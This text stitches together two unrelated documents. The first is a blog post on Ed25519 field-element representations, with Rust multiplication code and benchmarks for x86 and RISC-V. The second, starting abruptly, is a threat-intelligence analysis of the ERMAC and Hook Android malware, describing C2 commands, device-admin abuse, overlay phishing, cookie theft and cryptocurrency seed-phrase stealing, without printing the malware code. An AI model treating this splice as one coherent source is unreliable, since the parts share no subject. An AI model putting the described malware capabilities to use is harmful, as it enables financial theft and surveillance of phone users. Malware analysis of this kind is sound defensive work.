
On Multiplications with Unsaturated Limbs

This post is about a rather technical coding strategy choice that arises when implementing cryptographic algorithms on some elliptic curves, namely how to represent elements of the base field. We will be discussing Curve25519 implementations, in particular as part of Ed25519 signatures, as specified in RFC 8032. The most widely used Rust implementation of these operations is the curve25519-dalek library. My own research library is crrl, also written in plain Rust (no assembly); it is meant for research purposes, but I write it using all best practices for production-level implementations, e.g. it is fully constant-time and offers an API amenable to integration into various applications.

The following table measures performance of Ed25519 signature generation and verification with these libraries, using various backend implementations for operations in the base field (integers modulo 2^255 – 19), on two test platforms (64-bit x86, and 64-bit RISC-V):

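| Library          | Backend | x86 (Intel “Coffee Lake”) sign | x86 (Intel “Coffee Lake”) verify | RISC-V (SiFive U74) sign | RISC-V (SiFive U74) verify |
|------------------|---------|--------------------------------|----------------------------------|--------------------------|----------------------------|
| crrl             | m64     | 49130                          | 108559                           | 202021                   | 412764                     |
| crrl             | m51     | 70149                          | 148653                           | 158928                   | 304902                     |
| curve25519-dalek | simd    | 59553                          | 116243                           | n/a                      | n/a                        |
| curve25519-dalek | serial  | 59599                          | 169621                           | 180142                   | 449980                     |
| curve25519-dalek | fiat    | 70552                          | 198289                           | 187220                   | 429755                     |

Ed25519 performance (in clock cycles), on x86 and RISC-V.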

Test platforms are the following:

  • x86: an Intel Core i5-8259U CPU, running at 2.30 GHz (TurboBoost is disabled). This uses “Coffee Lake” cores (one of the late variants of the “Skylake” line). Operating system is Linux (Ubuntu 22.04), in 64-bit mode.
  • RISC-V: a StarFive VisionFive2 board with a StarFive JH7110 CPU, running at 1 GHz. The CPU contains four SiFive U74 cores and implements the I, M, C, Zba and Zbb architecture extensions (and some others which are not relevant here). Operating system is again Linux (Ubuntu 23.04), in 64-bit mode.

In both cases, the current Rust “stable” version is used (1.72.0, from 2023-08-23), and compilation uses the environment variable RUSTFLAGS="-C target-cpu=native" to allow the compiler to use all opcodes supported by the current platform. The computation is performed over a single core, with measurements averaged over randomized inputs. The CPU cycle counter is used. Figures above are listed with many digits, but in practice there is some natural variance due to varying inputs (signature verification is not constant-time, since it uses only public data) and, more generally, because of other activity within the CPU (e.g. management mode, cache usage from other cores, hardware interrupts…). The measured values should thus be taken with a grain of salt: roughly speaking, differences below about 3% are not significant.

crrl and curve25519-dalek differ a bit in how they use internal tables to speed up computations; in general, crrl tables are smaller, and crrl performs fewer point additions but more point doublings. For signature verification, crrl implements the Antipa et al. optimization with Lagrange’s algorithm for lattice basis reduction, but curve25519-dalek does not. The measurements above show that crrl’s strategy works, i.e. it is a tad faster than curve25519-dalek. (Not listed above is the fact that curve25519-dalek supports batch signature verification with a substantially lower per-signature cost; crrl does not implement that feature yet.) The point of this post is not to boast about how crrl is faster; its good performance should be taken as an indication that it is decently optimized and thus a fair illustration of the effect of its implementation strategy choices. Indeed, the interesting part is how the different backends compare to each other, on the two tested architectures.

curve25519-dalek has three backends:

  • serial: Field elements are split over 5 limbs of 51 bits; that is, value x is split into five values x0 to x4, such that x = x0 + 2^51·x1 + 2^102·x2 + 2^153·x3 + 2^204·x4. Importantly, limb values are held in 64-bit words and may somewhat exceed 2^51 (within some limits, to avoid overflows during computations). The representation is redundant, in that a given field element x accepts many different representations; a normalization step is applied when necessary (e.g. when serializing curve points into bytes).
  • fiat: The fiat backend is a wrapper around the fiat-crypto library, which uses basically the same implementation strategy as the serial backend, but through automatic code generation that includes a correctness proof. In other words, the fiat backend is guaranteed through the magic of mathematics to always return the correct result, while in all other library backends listed here, the guarantee is “only” through the non-magic of code auditors (including myself) poring over the code for hours in search of issues, and not finding any (in practice all the code referenced here is believed correct).
  • simd: AVX2 opcodes are used to perform arithmetic operations on four field elements in parallel; each element is split over ten limbs of 25 and 26 bits each. curve25519-dalek selects that backend whenever possible, i.e. on x86 systems which have AVX2 (such as an Intel “Coffee Lake”), but of course it is not available on RISC-V.
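
To make the 51-bit limb layout concrete, here is a minimal sketch of how a 32-byte little-endian value could be split into five 51-bit limbs and packed back. The function names limbs_from_bytes and bytes_from_limbs are hypothetical (they are not the API of either library), and the sketch assumes the limbs are already normalized below 2^51 when packing; it performs no reduction modulo 2^255 – 19.

```rust
/// Mask selecting the low 51 bits of a 64-bit word.
const MASK51: u64 = (1u64 << 51) - 1;

/// Split a 32-byte little-endian integer into five 51-bit limbs.
/// The top bit (bit 255) is ignored. Hypothetical helper for illustration.
fn limbs_from_bytes(bytes: &[u8; 32]) -> [u64; 5] {
    // Load 8 bytes as a little-endian u64, starting at byte offset `i`.
    let load8 = |i: usize| -> u64 {
        let mut w = [0u8; 8];
        w.copy_from_slice(&bytes[i..i + 8]);
        u64::from_le_bytes(w)
    };
    [
        load8(0) & MASK51,          // bits   0..51
        (load8(6) >> 3) & MASK51,   // bits  51..102 (byte 6 starts at bit 48)
        (load8(12) >> 6) & MASK51,  // bits 102..153 (byte 12 starts at bit 96)
        (load8(19) >> 1) & MASK51,  // bits 153..204 (byte 19 starts at bit 152)
        (load8(24) >> 12) & MASK51, // bits 204..255 (byte 24 starts at bit 192)
    ]
}

/// Pack five limbs (each assumed to be below 2^51) back into 32 bytes.
fn bytes_from_limbs(limbs: &[u64; 5]) -> [u8; 32] {
    let mut out = [0u8; 32];
    let mut acc: u128 = 0; // bit accumulator
    let mut acc_bits = 0;  // number of valid bits in `acc`
    let mut pos = 0;       // next output byte
    for &limb in limbs {
        acc |= (limb as u128) << acc_bits;
        acc_bits += 51;
        while acc_bits >= 8 {
            out[pos] = acc as u8;
            acc >>= 8;
            acc_bits -= 8;
            pos += 1;
        }
    }
    // 255 bits = 31 full bytes + 7 remaining bits.
    out[pos] = acc as u8;
    out
}
```

For instance, the value 2^51 (byte 6 set to 0x08) maps to limbs [0, 1, 0, 0, 0]. A real implementation must also handle limbs that exceed 2^51 and the final reduction before serializing, which this sketch leaves out.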

crrl has two backends:

  • m51: A “51-bit limbs” backend similar to curve25519-dalek’s “serial”, though with somewhat different choices for the actual operations (this is detailed later on).
  • m64: Field elements are split over four 64-bit limbs, held in 64-bit types. By nature, such limbs cannot exceed their 64-bit range. The representation is still slightly redundant in that overall values may use the complete 256-bit range, so that each field element has two or three possible representations (a final reduction modulo 2^255 – 19 is performed before serializing).

The “m64” backend could be deemed to be the most classical, in that such a representation would be what was preferred for big integer computations in, say, the 1990s. It minimizes the number of multiplication opcode invocations during a field element multiplication (with two 4-limb operands, 16 register multiplications are used), but also implies quite a lot of carry propagation. See for instance this excerpt of the implementation of field element multiplication in crrl’s m64 backend:

    let (e0, e1) = umull(a0, b0);
    let (e2, e3) = umull(a1, b1);
    let (e4, e5) = umull(a2, b2);
    let (e6, e7) = umull(a3, b3);

    let (lo, hi) = umull(a0, b1);
    let (e1, cc) = addcarry_u64(e1, lo, 0);
    let (e2, cc) = addcarry_u64(e2, hi, cc);
    let (lo, hi) = umull(a0, b3);
    let (e3, cc) = addcarry_u64(e3, lo, cc);
    let (e4, cc) = addcarry_u64(e4, hi, cc);
    let (lo, hi) = umull(a2, b3);
    let (e5, cc) = addcarry_u64(e5, lo, cc);
    let (e6, cc) = addcarry_u64(e6, hi, cc);
    let (e7, _) = addcarry_u64(e7, 0, cc);

    let (lo, hi) = umull(a1, b0);
    let (e1, cc) = addcarry_u64(e1, lo, 0);
    let (e2, cc) = addcarry_u64(e2, hi, cc);
    let (lo, hi) = umull(a3, b0);
    let (e3, cc) = addcarry_u64(e3, lo, cc);
    let (e4, cc) = addcarry_u64(e4, hi, cc);
    let (lo, hi) = umull(a3, b2);
    let (e5, cc) = addcarry_u64(e5, lo, cc);
    let (e6, cc) = addcarry_u64(e6, hi, cc);
    let (e7, _) = addcarry_u64(e7, 0, cc);

The addcarry_u64() calls above implement the “add with carry” operation, which, on x86, maps to the ADC opcode (or, on that core, the ADCX or ADOX opcodes).
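
The excerpt relies on two helpers, umull() and addcarry_u64(), whose definitions are not shown. The following is a portable sketch of what such helpers could look like, with signatures inferred from how the excerpt calls them; it is an assumption for illustration, not the library's actual code (which may use CPU intrinsics instead). The add_2limbs function is a hypothetical example of chaining the carry.

```rust
/// 64x64 -> 128-bit multiplication; returns the (low, high) halves.
/// Portable stand-in written with u128 arithmetic.
fn umull(x: u64, y: u64) -> (u64, u64) {
    let z = (x as u128) * (y as u128);
    (z as u64, (z >> 64) as u64)
}

/// Add with carry: returns (sum modulo 2^64, output carry).
/// The input carry `c` must be 0 or 1.
fn addcarry_u64(x: u64, y: u64, c: u8) -> (u64, u8) {
    let z = (x as u128) + (y as u128) + (c as u128);
    (z as u64, (z >> 64) as u8)
}

/// Hypothetical usage: add two 128-bit values held as (low, high) pairs,
/// propagating the carry from the low limb into the high limb.
fn add_2limbs(a: (u64, u64), b: (u64, u64)) -> (u64, u64, u8) {
    let (lo, cc) = addcarry_u64(a.0, b.0, 0);
    let (hi, cc) = addcarry_u64(a.1, b.1, cc);
    (lo, hi, cc)
}
```

Each call in a chain depends on the carry produced by the previous one, which is why the latency of the add-with-carry opcode matters so much for this style of code.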

When Ed25519 signatures were invented, in 2011, the Intel CPUs du jour (Intel “Westmere” core) were not very good at carry propagation; they certainly supported the ADC opcode, but with a relatively high latency (2 cycles), and that made the classical code somewhat slow. The use of 51-bit limbs allowed for different code, which, in curve25519-dalek’s serial backend, looks like this:

    let b1_19 = b[1] * 19;
    let b2_19 = b[2] * 19;
    let b3_19 = b[3] * 19;
    let b4_19 = b[4] * 19;

    // Multiply to get 128-bit coefficients of output
    let c0: u128 = m(a[0], b[0]) + m(a[4], b1_19) + m(a[3], b2_19) + m(a[2], b3_19) + m(a[1], b4_19);
    let mut c1: u128 = m(a[1], b[0]) + m(a[0], b[1]) + m(a[4], b2_19) + m(a[3], b3_19) + m(a[2], b4_19);
    let mut c2: u128 = m(a[2], b[0]) + m(a[1], b[1]) + m(a[0], b[2]) + m(a[4], b3_19) + m(a[3], b4_19);
    let mut c3: u128 = m(a[3], b[0]) + m(a[2], b[1]) + m(a[1], b[2]) + m(a[0], b[3]) + m(a[4], b4_19);
    let mut c4: u128 = m(a[4], b[0]) + m(a[3], b[1]) + m(a[2], b[2]) + m(a[1], b[3]) + m(a[0], b[4]);

This code excerpt computes the result over five limbs which can now range over close to 128 bits, and some extra high part propagation (not shown above) is needed to shrink limbs down to 51 bits or so. As we see here, there are now 25 individual multiplications (the m() function), since there are five limbs per input. There still are ADC opcodes in there! They are somewhat hidden behind the additions: these additions are over Rust’s u128 type, a 128-bit integer type that internally uses two registers, so that each addition implies one ADC opcode. However, these carry propagations can occur mostly in parallel (there are five independent dependency chains here), and that maps well to the abilities of a Westmere core. On such cores, the “serial” backend is faster than crrl’s m64. However, in later x86 CPUs from Intel (starting with the Haswell core), support for add-with-carry opcodes was substantially improved, and the classical method with 64-bit limbs again gained the upper hand. This was already noticed by Nath and Sarkar in 2018 and this explains why crrl’s m64 backend, on our x86 test system, is faster than curve25519-dalek’s serial and fiat backends, and even a bit faster than the AVX2-powered simd backend.
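
For readers who want to see the excerpt in a complete function, here is a self-contained sketch that adds the “high part propagation” step mentioned above. The multiplication lines follow the excerpt; the carry chain, the function name mul51, and the assumption that input limbs are below 2^54 are my own choices for illustration and are not guaranteed to match the library line for line.

```rust
/// Mask selecting the low 51 bits of a 64-bit word.
const LOW_51_BIT_MASK: u64 = (1u64 << 51) - 1;

/// 64x64 -> 128-bit product (stand-in for the m() helper of the excerpt).
fn m(x: u64, y: u64) -> u128 {
    (x as u128) * (y as u128)
}

/// Multiply two field elements held as five 51-bit limbs.
/// Assumption: every input limb is below 2^54, so nothing overflows.
fn mul51(a: &[u64; 5], b: &[u64; 5]) -> [u64; 5] {
    // 2^255 = 19 modulo 2^255 - 19: terms that wrap past 2^255 get a factor 19.
    let b1_19 = b[1] * 19;
    let b2_19 = b[2] * 19;
    let b3_19 = b[3] * 19;
    let b4_19 = b[4] * 19;

    let c0: u128 = m(a[0], b[0]) + m(a[4], b1_19) + m(a[3], b2_19) + m(a[2], b3_19) + m(a[1], b4_19);
    let mut c1: u128 = m(a[1], b[0]) + m(a[0], b[1]) + m(a[4], b2_19) + m(a[3], b3_19) + m(a[2], b4_19);
    let mut c2: u128 = m(a[2], b[0]) + m(a[1], b[1]) + m(a[0], b[2]) + m(a[4], b3_19) + m(a[3], b4_19);
    let mut c3: u128 = m(a[3], b[0]) + m(a[2], b[1]) + m(a[1], b[2]) + m(a[0], b[3]) + m(a[4], b4_19);
    let mut c4: u128 = m(a[4], b[0]) + m(a[3], b[1]) + m(a[2], b[2]) + m(a[1], b[3]) + m(a[0], b[4]);

    // Propagate the high part of each coefficient into the next one.
    let mut out = [0u64; 5];
    c1 += c0 >> 51;
    out[0] = (c0 as u64) & LOW_51_BIT_MASK;
    c2 += c1 >> 51;
    out[1] = (c1 as u64) & LOW_51_BIT_MASK;
    c3 += c2 >> 51;
    out[2] = (c2 as u64) & LOW_51_BIT_MASK;
    c4 += c3 >> 51;
    out[3] = (c3 as u64) & LOW_51_BIT_MASK;
    let carry = (c4 >> 51) as u64;
    out[4] = (c4 as u64) & LOW_51_BIT_MASK;

    // The carry out of the top limb has weight 2^255, i.e. 19 modulo p.
    out[0] += carry * 19;
    out[1] += out[0] >> 51;
    out[0] &= LOW_51_BIT_MASK;
    out
}
```

As a quick sanity check, multiplying 2^204 (limbs [0, 0, 0, 0, 1]) by 2^51 (limbs [0, 1, 0, 0, 0]) yields 2^255, which this function returns as [19, 0, 0, 0, 0]. The output limbs may still slightly exceed 2^51, consistent with the redundant representation.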

RISC-V

Now enters the RISC-V platform. RISC-V is an open architecture which has been designed with what can be viewed as “pure RISC philosophy”, with a much reduced instruction set. It is inspired by the older DEC Alpha, including in particular a large number of integer registers (32), one of which is fixed to the value zero, and, most notably, no carry flag at all. An “add-with-carry” operation, which adds together two 64-bit inputs x and y and an input carry c, and outputs a 64-bit result z and an output carry d, now requires no fewer than five instructions:

  1. Add x and y, into z (ADD).
  2. Compare z to x (SLTU): if z is strictly lower, then the addition “wrapped around”; the comparison output (0 or 1) is written into d.
  3. Add c to z (ADD).
  4. Compare z to c (SLTU) for another potential “wrap around”, with a 0 or 1 value written into another register t.
  5. Add t to d (ADD).

(I cannot prove that it is not doable in fewer RISC-V instructions; if there is a better solution please tell me.)
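
The five steps can be written out in Rust, with one statement per RISC-V instruction. This is only a sketch to make the sequence explicit: the function name adc_no_flags is hypothetical, and an actual compiler is free to emit a different instruction sequence for it.

```rust
/// Add-with-carry without a carry flag, mirroring the five-step sequence.
/// `c` is the input carry (0 or 1); returns (z, d) with d the output carry.
fn adc_no_flags(x: u64, y: u64, c: u64) -> (u64, u64) {
    let z = x.wrapping_add(y); // 1. ADD:  z = x + y (mod 2^64)
    let d = (z < x) as u64;    // 2. SLTU: did the first addition wrap around?
    let z = z.wrapping_add(c); // 3. ADD:  add the input carry
    let t = (z < c) as u64;    // 4. SLTU: did the second addition wrap around?
    let d = d + t;             // 5. ADD:  combine the two partial carries
    (z, d)
}
```

The two partial carries can never both be 1: if the first addition wrapped, then z is at most 2^64 – 2, and adding a carry of 1 cannot wrap again. The output carry therefore stays in the 0..1 range.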

Thus, the add-with-carry is not only a high-latency sequence, but it also requires quite a few instructions, and instruction throughput may be a bottleneck. Our test platform (SiFive U74 core) is not well documented, but some cursory tests show the following:

  • Multiplication opcodes have a throughput of one per cycle, and a latency of three cycles (this seems constant-time). As per the RISC-V specification (“M” extension), a 64×64 multiplication with a 128-bit result requires two separate opcodes (MUL returns the low 64 bits of the result, MULHU returns the high 64 bits). There is a recommended code sequence for when the two opcodes relate to the same operands, but this does not appear to be leveraged by this particular CPU.
  • For “simple” operations such as ADD or SLTU, the CPU may schedule up to two instructions in the same cycle, but the exact conditions for this to happen are unclear, and each instruction still has a 1-cycle latency.

Under such conditions, a 5-instruction add-with-carry will need a minimum of 2.5 cycles (in terms of throughput). The main output (z) is available with a latency of 2 cycles, but the output carry has a latency of 4 cycles. A “partial” add-with-carry with no input carry is cheaper (an ADD and a SLTU), and so is an add-with-carry with no output carry (two ADDs), but these are still relatively expensive. The high latency is similar to the Westmere situation, but the throughput cost is new. For that RISC-V platform, we need to avoid not only long dependency chains of carry propagation, but we should also endeavour to do fewer carry propagations. Another operation which is similarly expensive is the split of a 115-bit value (held in a 128-bit variable) into a low (51 bits) and high (64 bits) parts. The straightforward Rust code looks like this (from curve25519-dalek):

    let carry: u64 = (c4 >> 51) as u64;
    out[4] = (c4 as u64) & LOW_51_BIT_MASK;

On x86, the 128-bit value is held in two registers; the low part is a simple bitwise AND with a constant, and the high part is extracted with a single SHLD opcode, which can extract a chunk out of the concatenation of two input registers. On RISC-V, there is no shift opcode with two input registers (not counting the shift count); instead, the extraction of the high part (called carry in the code excerpt above) requires three instructions: two single-register shifts (SRLI, SLLI) and one bitwise OR to combine the results.
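
Written against the two 64-bit halves of the 128-bit value, the split looks like the sketch below. The function name split_51 is hypothetical; the point is only to show the three operations (two shifts and an OR) needed for the high part when no double-register shift is available.

```rust
/// Mask selecting the low 51 bits of a 64-bit word.
const LOW_51_BIT_MASK: u64 = (1u64 << 51) - 1;

/// Split a 128-bit value into (low 51 bits, bits 51 and above as a u64),
/// working on the two 64-bit halves the way a 64-bit CPU has to.
fn split_51(c: u128) -> (u64, u64) {
    let lo = c as u64;         // low register
    let hi = (c >> 64) as u64; // high register
    let low51 = lo & LOW_51_BIT_MASK; // one AND
    let from_lo = lo >> 51;           // shift right: top 13 bits of the low register
    let from_hi = hi << 13;           // shift left: make room for those 13 bits
    let carry = from_lo | from_hi;    // OR: combine both pieces
    (low51, carry)
}
```

The result agrees with the excerpt's (c4 >> 51) as u64 and (c4 as u64) & LOW_51_BIT_MASK for any input; the difference is purely in how many instructions each formulation needs on a given CPU.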

In order to yield better performance on RISC-V, the crrl m51 backend does things a bit differently:

    let a0 = a0 << 6;
    let b0 = b0 << 7;
    // ...
    let (c00, h00) = umull(a0, b0);
    let d0 = c00 >> 13;

Here, the input limbs are pre-shifted (by 6 or 7 bits) so that the products are shifted by 13 bits. In that case, the boundary between the low and high parts falls exactly on the boundary between the two registers that receive the multiplication result; the extraction of the high part becomes free! The low part is obtained with a single opcode (a right shift of the low register by 13 bits). Moreover, instead of performing 128-bit additions, crrl’s m51 code adds the low and high parts separately:

    let d0 = c00 >> 13;
    let d1 = (c01 >> 13)
        + (c10 >> 13);
    let d2 = (c02 >> 13)
        + (c11 >> 13)
        + (c20 >> 13);
    // ...
    let h0 = h00;
    let h1 = h01 + h10;
    let h2 = h02 + h11 + h20;

In that way, all add-with-carry operations are avoided. This makes crrl’s m51 code somewhat slower than curve25519-dalek’s serial backend on x86, but it noticeably improves the performance on RISC-V.
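
The pre-shift trick can be checked in isolation with a small sketch. The helper names (mul_split_preshift, mul_split_reference, column_sum) are hypothetical, umull() is a portable stand-in, and the sketch assumes limbs small enough that the shifts lose no bits (a below 2^58, b below 2^57).

```rust
/// Mask selecting the low 51 bits of a 64-bit word.
const MASK51: u64 = (1u64 << 51) - 1;

/// 64x64 -> 128-bit multiplication; returns the (low, high) halves.
fn umull(x: u64, y: u64) -> (u64, u64) {
    let z = (x as u128) * (y as u128);
    (z as u64, (z >> 64) as u64)
}

/// Product of two limbs, split at bit 51, using pre-shifted inputs.
/// The total shift is 6 + 7 = 13 bits, and 51 + 13 = 64, so the split
/// point lands exactly on the boundary between the two result registers.
fn mul_split_preshift(a: u64, b: u64) -> (u64, u64) {
    let (c, h) = umull(a << 6, b << 7);
    (c >> 13, h) // low 51 bits of a*b, and (a*b) >> 51
}

/// Reference version: full 128-bit product, then mask and shift.
fn mul_split_reference(a: u64, b: u64) -> (u64, u64) {
    let p = (a as u128) * (b as u128);
    ((p as u64) & MASK51, (p >> 51) as u64)
}

/// Sum several products by adding low and high parts separately,
/// with plain 64-bit additions and no carry between the two sums.
fn column_sum(pairs: &[(u64, u64)]) -> (u64, u64) {
    let mut d = 0u64;
    let mut h = 0u64;
    for &(a, b) in pairs {
        let (lo, hi) = mul_split_preshift(a, b);
        d += lo;
        h += hi;
    }
    (d, h)
}
```

The pair (d, h) returned by column_sum represents the value d + 2^51·h, which equals the sum of the products. The low sum d may exceed 51 bits, but that excess is absorbed later by the normal limb propagation rather than by an add-with-carry at every step.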

Conclusion

The discussion above is about a fairly technical point. In the grand scheme of things, the differences in performance between the various implementation strategies are not great; there are not many usage contexts where a speed difference of less than 30% in computing or verifying Ed25519 signatures has any relevance to overall application performance. But, insofar as such things matter, the following points are to be remembered:

  • Modern large CPUs (for laptops and servers) are good at handling add-with-carry, and for them the classical “64-bit limbs” format tends to be the fastest.
  • Some smaller CPUs will be happier with 51-bit limbs. However, there is no one-size-fits-all implementation strategy: for some CPUs, the main issue is the latency of add-with-carry, while for some others, in particular RISC-V systems, the instruction throughput is the bottleneck.

From ERMAC to Hook: Investigating the technical differences between two Android malware variants

Authored by Joshua Kamp (main author) and Alberto Segura.

Summary

Hook and ERMAC are Android based malware families that are both advertised by the actor named “DukeEugene”. Hook is the latest variant to be released by this actor and was first announced at the start of 2023. In this announcement, the actor claims that Hook was written from scratch [1]. In our research, we have analysed two samples of Hook and two samples of ERMAC to further examine the technical differences between these malware families.

After our investigation, we concluded that the ERMAC source code was used as a base for Hook. All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also exist in Hook. The code implementation for these commands is nearly identical. The main features in ERMAC are related to sending SMS messages, displaying a phishing window on top of a legitimate app, extracting a list of installed applications, SMS messages and accounts, and automated stealing of recovery seed phrases for multiple cryptocurrency wallets.

Hook has introduced a lot of new features, with a total of 38 additional commands when comparing the latest version of Hook to ERMAC. The most interesting new features in Hook are: streaming the victim’s screen and interacting with the interface to gain complete control over an infected device, the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, due to “leaving for special military operation”. On May 11th, 2023, the actors claimed that the source code of Hook was sold at a price of $70,000. If these announcements are true, it could mean that we will see interesting new versions of Hook in the future.

The launch of Hook

On the 12th of January 2023, DukeEugene started advertising a new Android botnet to be available for rent: Hook.

Forum post where DukeEugene first advertised Hook.

Hook malware is designed to steal personal information from its infected users. It contains features such as keylogging, injections/overlay attacks to display phishing windows over (banking) apps (more on this in the “Overlay attacks” section of this blog), and automated stealing of cryptocurrency recovery seeds.

Financial gain seems to be the main motivator for operators that rent Hook, but the malware can be used to spy on its victims as well. Hook is rented out at a cost of $7,000 per month.

Forum post showing the rental price of Hook, along with the claim that it was written from scratch.

The malware was advertised with a wide range of functionality in both the control panel and build itself, and a snippet of this can be seen in the screenshot below.

Some of Hook’s features that were advertised by DukeEugene.

Command comparison

Analyst’s note: The package names and file hashes that were analysed for this research can be found in the “Analysed samples” section at the end of this blog post.

While checking out the differences in these malware families, we compared the C2 commands (instructions that are sent by the malware operator to the infected device) in each sample. This analysis led us to find several new commands and features in Hook, as can be seen just by looking at the number of commands implemented in each variant.

| Sample               | Number of commands |
|----------------------|--------------------|
| Hook sample #1       | 58                 |
| Hook sample #2       | 68                 |
| Ermac sample #1 & #2 | 30                 |

All 30 commands that exist in ERMAC also exist in Hook. Most of these commands are related to sending SMS messages, updating and starting injections, extracting a list of installed applications, SMS messages and accounts, and starting another app on the victim’s device (where cryptocurrency wallet apps are the main target). While simply launching another app may not seem that malicious at first, you will think differently after learning about the automated features in these malware families.

Automated features in the Hook C2 panel.

Both Hook and ERMAC contain automated functionality for stealing recovery seeds from cryptocurrency wallets. These can be used to gain access to the victim’s cryptocurrency. We will dive deeper into this feature later in the blog.

When comparing Hook to ERMAC, 29 new commands have been added to the first sample of Hook that we analysed, and the latest version of Hook contains 9 additional commands on top of that. Most of the commands that were added in Hook are related to interacting with the user interface (UI).

Hook command: start_vnc

The UI interaction related commands (such as “clickat” to click on a specific UI element and “longpress” to dispatch a long press gesture) in Hook go hand in hand with the new “start_vnc” command, which starts streaming the victim’s screen.

A decompiled method that is called after the “start_vnc” command is received by the bot.

In the code snippet above we can see that the createScreenCaptureIntent() method is called on the MediaProjectionManager, which is necessary to start screen capture on the device. Along with the many commands to interact with the UI, this allows the malware operator to gain complete control over an infected device and perform actions on the victim’s behalf.


Controls for the malware operator related to the “start_vnc” command.

Command implementation

For the commands that are available in both ERMAC and Hook, the code implementation is nearly identical. Take the “logaccounts” command for example:

Decompiled code that is related to the “logaccounts” command in ERMAC and Hook.

This command is used to obtain a list of available accounts by their name and type on the victim’s device. When comparing the code, it’s clear that the logging messages are the main difference. This is the case for all commands that are present in both ERMAC and Hook.

Russian commands

Both ERMAC and the Hook v1 sample that we analysed contain some rather edgy commands in Russian, that do not provide any useful functionality.

Decompiled code which contains Russian text in ERMAC and first versions of Hook.

The command above translates to “Die_he_who_reversed_this“.

All the Russian commands create a file named “system.apk” in the “apk” directory and immediately delete it. It appears that the authors have recently adapted their approach to managing a reputable business, as these commands were removed in the latest Hook sample that we analysed.

New commands in Hook V2

In the latest versions of Hook, the authors have added 9 additional commands compared to the first Hook sample that we analysed. These commands are:

| Command        | Description |
|----------------|-------------|
| send_sms_many  | Sends an SMS message to multiple phone numbers |
| addwaitview    | Displays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed |
| removewaitview | Removes the “wait / loading” view that is displayed on the victim’s device because of the “addwaitview” command |
| addview        | Adds a new view with a black background that covers the entire screen |
| removeview     | Removes the view with the black background that was added by the “addview” command |
| cookie         | Steals session cookies (targets victim’s Google account) |
| safepal        | Starts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service) |
| exodus         | Starts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service) |
| takephoto      | Takes a photo of the victim using the front facing camera |

One of the already existing commands, “onkeyevent”, also received a new payload option: “double_tap”. As the name suggests, this performs a double tap gesture on the victim’s screen, providing the malware operator with extra functionality to interact with the victim’s device user interface.

More interesting additions are: the support for stealing recovery seed phrases from other crypto wallets (Safepal and Exodus), taking a photo of the victim, and stealing session cookies. Session cookie stealing appears to be a popular trend in Android malware, as we have observed this feature being added to multiple malware families. This is an attractive feature, as it allows the actor to gain access to user accounts without needing the actual login credentials.

Device Admin abuse

Besides adding new commands, the authors have added more functionality related to the “Device Administration API” in the latest version of Hook. This API was developed to support enterprise apps in Android. When an app has device admin privileges, it gains additional capabilities meant for managing the device. This includes the ability to enforce password policies, locking the screen and even wiping the device remotely. As you may expect: abuse of these privileges is often seen in Android malware.

DeviceAdminReceiver and policies

To implement custom device admin functionality, a new class should extend the “DeviceAdminReceiver”. This class can be found by examining the app’s Manifest file and searching for the receiver with the “BIND_DEVICE_ADMIN” permission or the “DEVICE_ADMIN_ENABLED” action.

Defined device admin receiver in the Manifest file of Hook 2.

In the screenshot above, you can see an XML file declared as follows: android:resource="@xml/buyanigetili". This file will contain the device admin policies that can be used by the app. Here’s a comparison of the device admin policies in ERMAC, Hook 1, and Hook 2:

Differences between device admin policies in ERMAC and Hook.

Comparing Hook to ERMAC, the authors have removed the “WIPE_DATA” policy and added the “RESET_PASSWORD” policy in the first version of Hook. In the latest version of Hook, the “DISABLE_KEYGUARD_FEATURES” and “WATCH_LOGIN” policies were added. Below you’ll find a description of each policy that is seen in the screenshot.

| Device Admin Policy                   | Description |
|---------------------------------------|-------------|
| USES_POLICY_FORCE_LOCK                | The app can lock the device |
| USES_POLICY_WIPE_DATA                 | The app can factory reset the device |
| USES_POLICY_RESET_PASSWORD            | The app can reset the device’s password/pin code |
| USES_POLICY_DISABLE_KEYGUARD_FEATURES | The app can disable use of keyguard (lock screen) features, such as the fingerprint scanner |
| USES_POLICY_WATCH_LOGIN               | The app can watch login attempts from the user |

The “DeviceAdminReceiver” class in Android contains methods that can be overridden. This is done to customise the behaviour of a device admin receiver. For example: the “onPasswordFailed” method in the DeviceAdminReceiver is called when an incorrect password is entered on the device. This method can be overridden to perform specific actions when a failed login attempt occurs. In ERMAC and Hook 1, the class that extends the DeviceAdminReceiver only overrides the onReceive() method and the implementation is minimal:


Full implementation of the class to extend the DeviceAdminReceiver in ERMAC. The first version of Hook contains the same implementation.

The onReceive() method is the entry point for broadcasts that are intercepted by the device admin receiver. In ERMAC and Hook 1 this only performs a check to see whether the received parameters are null and will throw an exception if they are.

DeviceAdminReceiver additions in latest version of Hook

In the latest edition of Hook, the class to extend the DeviceAdminReceiver does not just override the “onReceive” method. It also overrides the following methods:

| Device Admin Method   | Description |
|-----------------------|-------------|
| onDisableRequested()  | Called when the user attempts to disable device admin. Gives the developer a chance to present a warning message to the user |
| onDisabled()          | Called prior to device admin being disabled. Upon return, the app can no longer use the protected parts of the DevicePolicyManager API |
| onEnabled()           | Called after device admin is first enabled. At this point, the app can use “DevicePolicyManager” to set the desired policies |
| onPasswordFailed()    | Called when the user has entered an incorrect password for the device |
| onPasswordSucceeded() | Called after the user has entered a correct password for the device |

When the victim attempts to disable device admin, a warning message is displayed that contains the text “Your mobile is die”.

Decompiled code that shows the implementation of the “onDisableRequested” method in the latest version of Hook.

The fingerprint scanner is disabled when an incorrect password is entered on the victim’s device, possibly to make it easier to break into the device later by forcing the victim to enter their PIN and capturing it.

Decompiled code that shows the implementation of the “onPasswordFailed” method in the latest version of Hook.

All keyguard (lock screen) features are enabled again when a correct password is entered on the victim’s device.

Decompiled code that shows the implementation of the “onPasswordSucceeded” method in the latest version of Hook.

Overlay attacks

Overlay attacks, also known as injections, are a popular tactic to steal credentials on Android devices. When an app has permission to draw overlays, it can display content on top of other apps that are running on the device. This is interesting for threat actors, because it allows them to display a phishing window over a legitimate app. When the victim enters their credentials in this window, the malware will capture them.

Both ERMAC and Hook use web injections to display a phishing window as soon as they detect a targeted app being launched on the victim’s device.

Decompiled code that shows partial implementation of overlay injections in ERMAC and Hook.

